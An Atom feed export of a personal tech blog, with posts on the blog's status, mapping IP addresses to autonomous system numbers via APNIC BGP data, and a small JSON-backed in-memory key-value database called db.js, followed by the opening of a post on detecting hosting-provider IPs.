incolumitas.comhttps://incolumitas.com/2023-10-01T18:05:00+02:00The State of this Blog2023-10-01T18:05:00+02:002023-10-01T18:05:00+02:00Nikolai Tschachertag:incolumitas.com,2023-10-01:/2023/10/01/the-state-of-this-blog/<p>An update regarding the state of this blog</p><figure>
<img src="https://incolumitas.com/images/me-on-chasseral.jpg" alt="just me" />
<figcaption>A rare moment I am not working...</figcaption>
</figure>
<p>I haven't posted since over one year. The reasons for that are as follows:</p>
<ol>
<li>My current job keeps me quite busy</li>
<li>For obvious reasons, I cannot publish blog posts about scraping, bot detection, proxy detection and related topics right now</li>
<li>I am currently just not creative enough to come up with new computer science side projects</li>
</ol>
<p>I think the main reason for the lack of new blog posts is just my general lack of passions to explore new paths in computer science.</p>
<p>Especially now in the area of stunning AI advances, it just seems it is only a matter of time until human creativity is not needed anymore. I hope I am wrong.</p>
<p>I could maybe switch to discuss more societal or political topics, but I doubt I could ever rebrand this blog towards that direction. Therefore, I won't do it.</p>
<p>However, this blog will prevail and at some time there will be fresh blog articles again. I started the blog in 2012 and this blog will likely stay for another 10 years.</p>
<p>If you guys have some interesting things to explore, please leave a comment. I am looking for something exciting...</p>How to find the ASN for any IP Address?2022-07-31T20:34:00+02:002022-07-31T20:34:00+02:00Nikolai Tschachertag:incolumitas.com,2022-07-31:/2022/07/31/Find-the-ASN-for-any-IP-Address/<p>In the Internet, each IP Address belongs to an autonomous system (AS). In this blog article, it is demonstrated how any IP address can be mapped to an AS number. The necessary information and sources to map each IP Address to an Autnomous System is provided as well, since they were not easy to find.</p><h2>ASN Lookup Demo</h2>
<div class="ipAPIDemo">
<label style="font-weight: 600; font-size: 15px" for="ip">Enter IP address to find its ASN</label>
<input style="padding: 6px;" type="text" id="ip" name="ip" value="13.34.52.117">
<input class="orange_button" type="submit" value="Lookup ASN">
<div>
<p><strong>Lookup Examples:</strong>
<a class="api-example" data-query="AS209103" href="#">AS209103</a> —
<a class="api-example" data-query="AS7359" href="#">AS7359</a> —
<a class="api-example" data-query="AS10846" href="#">AS10846</a>
</p>
</div>
<pre id="wrapper">
<code id="data"class="JSON hljs">{
"message": "Please make an API request",
}</code>
</pre>
</div>
<script>
var el = document.getElementById('data');
hljs.highlightBlock(el);
function makeApiRequest(query) {
let url = query ? 'https://api.incolumitas.com/datacenter?ip=' + query : 'https://api.incolumitas.com/datacenter';
fetch(url)
.then(response => response.json())
.then(function(data) {
var el = document.getElementById('data');
if (data) {
try {
delete data.is_datacenter;
delete data.datacenter;
} catch (err) {}
}
el.innerHTML = JSON.stringify(data, null, 2);
hljs.highlightBlock(el);
if (!query) {
document.getElementById('ip').value = data.ip;
}
})
}
let linkNodes = document.querySelectorAll('a.api-example');
for (let node of linkNodes) {
node.addEventListener('click', function(evt) {
evt.preventDefault();
let query = evt.target.getAttribute('data-query');
document.getElementById('ip').value = query;
makeApiRequest(query);
});
}
makeApiRequest('');
document.querySelector('.ipAPIDemo input[type="submit"]').addEventListener('click', function(evt) {
var ip = document.getElementById('ip').value;
makeApiRequest(ip)
})
</script>
<p><a
class="orange_button"
href="https://incolumitas.com/pages/Datacenter-IP-API/">
ASN API Page
</a></p>
<h2>Introduction</h2>
<p>The Internet consists of many independent systems which are called <strong>Autonomous Systems (AS)</strong>. Those autonomous systems are assigned a number, the <strong>ASN</strong>. An autonomous system belongs to a single administrative organisation that defines a coherent routing policy to the rest of the Internet (And especially to the neighboring autonomous systems). The <a href="https://en.wikipedia.org/wiki/Border_Gateway_Protocol">Border Gateway Protocol (BGP)</a> implements AS routing policies.</p>
<p>You can think of autonomous systems as a subset of the Internet that follows a common routing policy and that is controlled by one administrative entity (Such as a large ISP or a public organization such as an University). Each IPv4 and IPv6 address belongs to exactly one autonomous system. Furthermore, each autonomous system can have multiple IPv4 and IPv6 address ranges assigned to it.</p>
<p>AS numbers are either 16-bit integers or 32-bit integers. So for example, <code>AS34953</code> is an autonomous system number that belongs to the organization <code>RELAIX RelAix Networks GmbH</code> (Which is actually the organsiation responsible for providing Internet to the train from which I am writing this blog article):</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="nx">asn</span><span class="o">:</span> <span class="mf">34953</span><span class="p">,</span>
<span class="nx">cidr</span><span class="o">:</span> <span class="s1">'46.183.96.0/21'</span><span class="p">,</span>
<span class="nx">descr</span><span class="o">:</span> <span class="s1">'RELAIX RelAix Networks GmbH, DE'</span><span class="p">,</span>
<span class="nx">country</span><span class="o">:</span> <span class="s1">'DE'</span>
<span class="p">}</span>
</code></pre></div>
<p>Now the questions begs to be answered what IP ranges are <em>owned</em> by this autonomous system (AS)? Of course, it is possible to obtain this information (I will soon reveal how). For now, let's see what IP ranges belong to the organization <code>RELAIX RelAix Networks GmbH</code>:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="s2">"asn"</span><span class="o">:</span> <span class="mf">34953</span><span class="p">,</span>
<span class="s2">"descr"</span><span class="o">:</span> <span class="s2">"RELAIX RelAix Networks GmbH, DE"</span><span class="p">,</span>
<span class="s2">"country"</span><span class="o">:</span> <span class="s2">"de"</span><span class="p">,</span>
<span class="s2">"prefixes"</span><span class="o">:</span> <span class="p">[</span>
<span class="s2">"5.145.128.0/20"</span><span class="p">,</span>
<span class="s2">"5.199.240.0/20"</span><span class="p">,</span>
<span class="s2">"45.146.172.0/22"</span><span class="p">,</span>
<span class="s2">"46.183.96.0/21"</span><span class="p">,</span>
<span class="s2">"88.218.160.0/22"</span><span class="p">,</span>
<span class="s2">"93.159.248.0/21"</span><span class="p">,</span>
<span class="s2">"129.192.10.0/24"</span><span class="p">,</span>
<span class="s2">"129.192.11.0/24"</span><span class="p">,</span>
<span class="s2">"161.51.255.0/24"</span><span class="p">,</span>
<span class="s2">"185.164.96.0/22"</span><span class="p">,</span>
<span class="s2">"185.217.62.0/24"</span><span class="p">,</span>
<span class="s2">"185.221.208.0/22"</span><span class="p">,</span>
<span class="s2">"185.243.232.0/23"</span><span class="p">,</span>
<span class="s2">"193.22.100.0/23"</span><span class="p">,</span>
<span class="s2">"193.28.5.0/24"</span><span class="p">,</span>
<span class="s2">"193.32.64.0/24"</span><span class="p">,</span>
<span class="s2">"195.242.220.0/24"</span>
<span class="p">],</span>
<span class="s2">"prefixesIPv6"</span><span class="o">:</span> <span class="p">[</span>
<span class="s2">"2001:678:184::/48"</span><span class="p">,</span>
<span class="s2">"2001:67c:13b0::/48"</span><span class="p">,</span>
<span class="s2">"2001:67c:2054::/48"</span><span class="p">,</span>
<span class="s2">"2a00:fe0::/32"</span><span class="p">,</span>
<span class="s2">"2a0c:3000::/32"</span><span class="p">,</span>
<span class="s2">"2a0d:ae80::/32"</span><span class="p">,</span>
<span class="s2">"2a10:d900::/32"</span>
<span class="p">],</span>
<span class="s2">"active"</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="s2">"elapsed_ms"</span><span class="o">:</span> <span class="mf">0.06</span>
<span class="p">}</span>
</code></pre></div>
<p>As you can see, the autonomous system <code>AS34953</code> has IP ranges from totally different IPv4 <code>/8</code> address blocks. This might seem counterintuitive, but due to the rarity of IPv4 addresses, it is not uncommon to have different <code>/8</code> IPv4 ranges in a single AS.</p>
<figure>
<img src="https://incolumitas.com/images/ASN-Connections-In-RIPE-NCC.jpg" alt="ASN-Connections-In-RIPE-NCC" />
<figcaption>Visualizations of ASN Connections in RIPE NCC
<span style="font-size: 70%">(Source: <a href="https://thyme.apnic.net/BGP/RIPE/#">https://thyme.apnic.net/BGP/RIPE/#</a>)</span>
</figcaption>
</figure>
<p><strong>Why are autonomous systems relevant in IT security?</strong></p>
<p>In defensive IT Security, you often want to block offending IP addresses in order to stop spammers and ongoing attacks from hackers or botnets. Advanced or institutional attackers often own large blocks of IP addresses, therefore blocking single IP addresses is often not going to cut it. This problem becomes especially apparent with the gradual adoption of IPv6, where you can practically obtain huge ranges of IPv6 addresses without much effort.</p>
<p>By obtaining the ASN for each of the attacking IP addresses, it can potentially be learned that the attacker is launching her attack from only few distinct autonomous systems. Then as a first and drastic measure, an entire or multiple ASN's can be blocked in order to quickly chocke an ongoing attack.</p>
<p>Furthermore, an autonomous system can often be mapped to a country, which gives geographical location information for an IP address, which may further help to contextualize an ongoing attack.</p>
<p>Furthermore, by knowing the AS organization of an IP address, it is also possible to draw futher conclucsions: Is the organization an large and established ISP? Is it a company with a good reputation? Or is it a unknown business with a reputation for a leniant policy regarding spammers?</p>
<h2>How can IP addresses be mapped to Autonmous System Numbers (ASN)?</h2>
<p>The management & coordination of administrative tasks of the whole Internet is divided among different Regional Internet Registries (RIR) such as </p>
<ol>
<li>ARIN</li>
<li>APNIC</li>
<li>RIPE NCC</li>
<li>AFRINIC</li>
<li>LACNIC</li>
</ol>
<p><a href="https://www.apnic.net/">APNIC</a> is the Regional Internet Registry responsible for the Asia-Pacific region. Luckily for us, APNIC makes BGP routing data publicly available. The data is originating from Internet Exchange points such as from <a href="https://thyme.apnic.net/current/">DIX-IE (formerly NSPIXP2) in Tokyo, Japan</a> or <a href="https://thyme.apnic.net/london/">Bhutan Telecom's router located at the LINX in London</a>).</p>
<p>The APNIC hosted page <a href="https://thyme.apnic.net/">https://thyme.apnic.net/</a> has an overview of all publicly available BGP routing table data that APNIC hosts, from which we can also download the required information to map AS numbers to IP addresses.</p>
<p>For the task to map any IPv4 and IPv6 address to an ASN, we need the following three files:</p>
<ol>
<li><a href="https://thyme.apnic.net/current/data-raw-table">IPv4 prefixes and their origin ASNs</a> - This file includes the mapping of all IPv4 Addresses to ASNs </li>
<li><a href="https://thyme.apnic.net/current/ipv6-raw-table">IPv6 prefixes and their origin ASNs</a> - This file includes the mapping of all IPv6 Addresses to ASNs</li>
<li><a href="https://thyme.apnic.net/current/data-used-autnums">ASN to name mapping for ASNs visible on the Internet today</a> - This file maps the ASN to it's stringified version, which basically is the humanly readable version of the ASN (descriptive name, usually includes information about the responsible organization).</li>
</ol>
<p>After downloading those three files (Downloading the data once a day is more than enough!), all the information necessary to map any IP address to an ASN is obtained. You can write your own ASN lookup tool that finds the ASN for an IP address.</p>
<p>Of course it's also possible do the inverse and to find all the IPv4 / IPv6 prefixes for a given ASN.</p>
<h2>Conclusion</h2>
<p>It was shown how ASN information can be obtained for any IP address and it was also explained why AS data adds usual information in many different IT Security use cases. Furthermore, a regularely updated website with the current mapping from IP addresses to ASNs was provided: <a href="https://thyme.apnic.net/current/">https://thyme.apnic.net/current/</a>.</p>
<p>A question to my readers: However, in case this website ceases to publish up-to-date ASN to IP mappings, where else could this information be obtained? Do other large Regional Internet Registries such as <a href="https://www.arin.net/">ARIN</a> or <a href="https://www.ripe.net/">RIPE NCC</a> provide equivalent information?</p>
<p><a href="https://incolumitas.com/pages/Datacenter-IP-API/">Link to the ASN API Page</a></p>db.js — In-Memory Key-Value Database with Persistent File Storage2022-05-29T12:36:00+02:002022-05-29T16:30:00+02:00Nikolai Tschachertag:incolumitas.com,2022-05-29:/2022/05/29/db.js-in-memory-key-value-database-with-persistent-file-storage/<p>Instead of using one of the many battle proofed and reliable database solutions out there, I rather created my own solution. In this quick blog post, I am announcing the release of <code>db.js</code> - A in-memory database with persistant file storage.</p><p><a class="btn" href="https://github.com/NikolaiT/db.js" style="padding: 10px; font-size: 16px;">Checkout db.js on GitHub</a></p>
<h1>Design Principles</h1>
<p>From the many programming projects (often API's) I have created in the past, I observed that I always need to persist data to disk in order to query/update it later. Quite frequently, I found myself (re)creating quick & dirty persistance logic. I usually store everything as JSON on disk. I don't like to use SQL databases if I don't have to.</p>
<p>Of course I could use something like <a href="https://memcached.org/">Memcached</a> or <a href="https://redis.io/">Redis</a>. Or even a SQL database service such as <a href="https://www.postgresql.org/">PostgreSQL</a>. To be honest, Memcached or Redis would have been a better solution.</p>
<p><img src="https://incolumitas.com/images/no_thanks.jpeg" alt="No thanks" style="border: 1px solid #767575;" /></p>
<p>Having discussed reinventing the wheel and that I like doing it, let's focus on the design principles and the capabilities that I need from <code>db.js</code>:</p>
<ol>
<li><strong>In-Memory</strong>: Recently stored data should be kept in an in-memory cache, since recent data is read and updated way more frequently than old data. This observation is <strong>paramount!</strong></li>
<li><strong>Key-Value semantics:</strong> I like to associate the stored object with an unique key. Therefore, I like to work with key-value storages.</li>
<li><strong>JSON Format</strong>: I like to store data as JSON in files, since the performance benefits of other data formats don't outweight the easiness to work with JSON. Put differently: I just don't have the time to learn any other data format than JSON. JSON is easily readable and that's what matters most. Everyone understands JSON. There are other things such BSON, but no one really cares about it.</li>
<li><strong>Persistance:</strong> I don't want to care about when/why/where to persist data. This should be done by <code>db.js</code> in the background in a safe and consistent manner. Data is persisted to simple JSON files after the memory-cache reaches a certain age or size.</li>
<li><strong>No SQL required:</strong> No complex SQL query semantic is needed. In fact, the only way I need to query data is:<ul>
<li>base on a key with lookup time <code>O(1)</code></li>
<li>based on a time range <code>(ts0, ts1)</code> where <code>ts0</code> and <code>ts1</code> are both timestamps</li>
<li>based on an index range <code>(start, stop)</code> where <code>start</code> and <code>stop</code> are both integers</li>
<li>if I don't specify any selection criteria, then <code>db.js</code> should just return the memory cache contents (lookup time <code>O(1)</code>)</li>
</ul>
</li>
<li><strong>Data does not need to be deleted:</strong> I don't care about deleting data. Delete operations are hard to implement, since a delete operation requires an index and reverse index update. In fact, providing a delete operation doesn't outweigh the complexity introduced by its implementation.</li>
</ol>
<h1>Quick Start & Usage</h1>
<p><code>db.js</code> allows you to work with key/value data without caring about data persistance and storage. All that <code>db.js</code> gives you is a key/value store. <code>db.js</code> persists data to disk as JSON files periodically and safely. Currently <code>db.js</code> does not run as a daemon, it will shut down safely when the process is terminated.</p>
<p>Installation:</p>
<div class="highlight"><pre><span></span><code>git clone https://github.com/NikolaiT/db.js
cd db.js/
</code></pre></div>
<p>Simple Usage:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">DBjs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'./dbjs'</span><span class="p">).</span><span class="nx">DBjs</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">db_js</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">DBjs</span><span class="p">();</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="s1">'4343'</span><span class="p">,</span> <span class="p">{</span><span class="s1">'name'</span><span class="o">:</span> <span class="s1">'test'</span><span class="p">});</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">db_js</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'4343'</span><span class="p">));</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
</code></pre></div>
<p>Of course <code>db.js</code> has many different configuration options that you can use:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">DBjs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'./dbjs'</span><span class="p">).</span><span class="nx">DBjs</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">config</span> <span class="o">=</span> <span class="p">{</span>
<span class="c1">// after what size in MB the memory cache should be persisted to disk</span>
<span class="nx">persist_after_MB</span><span class="o">:</span> <span class="mf">20</span><span class="p">,</span>
<span class="c1">// after what time in seconds the memory cache should be persisted to disk</span>
<span class="nx">persist_after_seconds</span><span class="o">:</span> <span class="mf">12</span> <span class="o">*</span> <span class="mf">60</span> <span class="o">*</span> <span class="mf">60</span><span class="p">,</span>
<span class="c1">// absolute/relative path to database directory</span>
<span class="nx">database_path</span><span class="o">:</span> <span class="s1">'/tmp/database/'</span><span class="p">,</span>
<span class="c1">// path to file where to log debug outputs to</span>
<span class="nx">logfile_path</span><span class="o">:</span> <span class="s1">'/tmp/dbjs.log'</span><span class="p">,</span>
<span class="c1">// after how many seconds should the cache and index be persisted</span>
<span class="nx">flush_interval</span><span class="o">:</span> <span class="mf">5</span> <span class="o">*</span> <span class="mf">60</span><span class="p">,</span>
<span class="c1">// file prefix for archived files</span>
<span class="nx">file_prefix</span><span class="o">:</span> <span class="s1">'dbjs_'</span><span class="p">,</span>
<span class="c1">// whether to print debug output</span>
<span class="nx">debug</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="c1">// max key size in bytes</span>
<span class="nx">max_key_size_bytes</span><span class="o">:</span> <span class="mf">1024</span><span class="p">,</span>
<span class="c1">// max value size in bytes</span>
<span class="nx">max_value_size_bytes</span><span class="o">:</span> <span class="mf">1048576</span><span class="p">,</span>
<span class="p">};</span>
<span class="kd">let</span> <span class="nx">db_js</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">DBjs</span><span class="p">(</span><span class="nx">config</span><span class="p">);</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="s1">'someKey'</span><span class="p">,</span> <span class="s1">'someValue'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">db_js</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'someKey'</span><span class="p">));</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
</code></pre></div>
<h2>More Realistic Example</h2>
<p>Obviously, using <code>db.js</code> like above does not make much sense. I use <code>db.js</code> mostly as data storage for the many web API's I am creating. Therefore, the following example using express is more useful:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">)</span>
<span class="kd">const</span> <span class="nx">DBjs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'./dbjs'</span><span class="p">).</span><span class="nx">DBjs</span>
<span class="kd">const</span> <span class="nx">config</span> <span class="o">=</span> <span class="p">{</span>
<span class="c1">// absolute/relative path to database directory</span>
<span class="nx">database_path</span><span class="o">:</span> <span class="s1">'/tmp/exampleDatabase/'</span><span class="p">,</span>
<span class="c1">// path to file where to log debug outputs to</span>
<span class="nx">logfile_path</span><span class="o">:</span> <span class="s1">'/tmp/example.log'</span><span class="p">,</span>
<span class="c1">// whether to print debug output</span>
<span class="nx">debug</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="p">};</span>
<span class="kd">let</span> <span class="nx">db_js</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">DBjs</span><span class="p">(</span><span class="nx">config</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">()</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">3000</span>
<span class="kd">function</span> <span class="nx">randomString</span><span class="p">(</span><span class="nx">length</span> <span class="o">=</span> <span class="mf">100</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">str</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">str</span> <span class="o">+=</span> <span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="mf">65</span> <span class="o">+</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">()</span> <span class="o">*</span> <span class="mf">25</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">str</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Setting keys: http://localhost:3000/set?key=alpha&value=beta</span>
<span class="c1">// Getting value for a key: http://localhost:3000/get?key=alpha</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">all</span><span class="p">(</span><span class="s1">'/set'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">key</span> <span class="o">===</span> <span class="kc">undefined</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">400</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'you must provide a key'</span> <span class="p">})</span>
<span class="p">}</span>
<span class="kd">let</span> <span class="nx">key</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">key</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">value</span> <span class="o">=</span> <span class="kc">undefined</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">value</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">value</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span> <span class="o">&&</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">value</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">value</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">value</span> <span class="o">===</span> <span class="kc">undefined</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">400</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'you must provide a value'</span> <span class="p">})</span>
<span class="p">}</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span> <span class="nx">value</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'ok'</span> <span class="p">})</span>
<span class="p">})</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/get'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">key</span> <span class="o">===</span> <span class="kc">undefined</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">400</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'you must provide a key'</span> <span class="p">})</span>
<span class="p">}</span>
<span class="kd">let</span> <span class="nx">key</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">key</span><span class="p">;</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="nx">db_js</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="nx">key</span><span class="p">))</span>
<span class="p">})</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/get_all'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">db_js</span><span class="p">.</span><span class="nx">_getn</span><span class="p">(</span><span class="mf">100000</span><span class="p">),</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">))</span>
<span class="p">})</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/insert_random'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">num</span> <span class="o">===</span> <span class="kc">undefined</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">400</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'you must provide the number of random values to insert with the key `num`'</span> <span class="p">})</span>
<span class="p">}</span>
<span class="kd">let</span> <span class="nx">num</span> <span class="o">=</span> <span class="nb">parseInt</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">num</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">num</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">db_js</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="nx">randomString</span><span class="p">(</span><span class="mf">5</span><span class="p">),</span> <span class="nx">randomString</span><span class="p">(</span><span class="mf">30</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">({</span> <span class="nx">msg</span><span class="o">:</span> <span class="s1">'ok'</span> <span class="p">})</span>
<span class="p">})</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">port</span><span class="p">,</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Example db.js app listening on port </span><span class="si">${</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">)</span>
<span class="p">})</span>
</code></pre></div>
<h1>db.js API</h1>
<p>The db.js API currently has five main API methods:</p>
<h4>set(key, value)</h4>
<p><code>set(key, value)</code> - Assigns the <code>value</code> to the <code>key</code> in the storage. If the <code>key</code> is already in the database, the value will be overwritten. keys are unique.</p>
<h4>get(key)</h4>
<p><code>get(key)</code> - Returns the <code>value</code> associated with <code>key</code> from the storage. The lookup time is <code>O(1)</code>.</p>
<h4>getn(index_range, time_range)</h4>
<p><code>getn(index_range, time_range)</code> - Returns an array of values in insertion order. This means that the most recent inserted value (Inserted with <code>set(key, value)</code>) is returned as first element of the array. When both <code>index_range=null</code> and <code>time_range=null</code> are set to <code>null</code>, then <code>getn()</code> returns the memory cache contents by default.</p>
<p>The variable <code>index_range</code> selects values to be returned by index range. If you specify <code>index_range=[0, 500]</code>, then the last 500 inserted values are returned.</p>
<p>The variable <code>time_range</code> selects values to be returned by an timestamp range. If you specify <code>time_range=[1649418657952, 1649418675192]</code>, then the items that were inserted between those two timestamps will be returned.</p>
<h4>index_size()</h4>
<p><code>index_size()</code> - Returns the index size of the database. This is equivalent to the number of all database entries and thus the size of the database.</p>
<h4>cache_size()</h4>
<p><code>cache_size()</code> - Returns the cache size of the database. The cache includes all database entries that are kept in memory.</p>How to find out if an IP address belongs to a Hosting / Cloud Provider?2022-03-09T17:45:00+01:002022-03-14T14:48:00+01:00Nikolai Tschachertag:incolumitas.com,2022-03-09:/2022/03/09/find-out-if-an-IP-address-belongs-to-a-hosting-provider/<p>It is not entirely trivial to find out if an IP address belongs to a datacenter / cloud provider. In this blog article, I try to find an algorithm that outputs with high confidence if an IPv4 / Ipv6 address belongs to a hosting provider or not.</p><p><a class="orange_button" href="https://incolumitas.com/pages/Datacenter-IP-API/">Also check the Datacenter IP address API site</a></p>
<h2>Introduction</h2>
<p>In the field of IT-Security, it is often paramount to find the <em>reputation</em> of an IP address.
The reputation of an IP address is an abstract construct, but it consists of several factors:</p>
<ol>
<li>How trustworthy is the underlying network provider / ISP? Is it known for spam and fraud?</li>
<li>How easy is it for third parties to send traffic in the name of it's network? Put differenty: Can I purchase hosting services from said provider?</li>
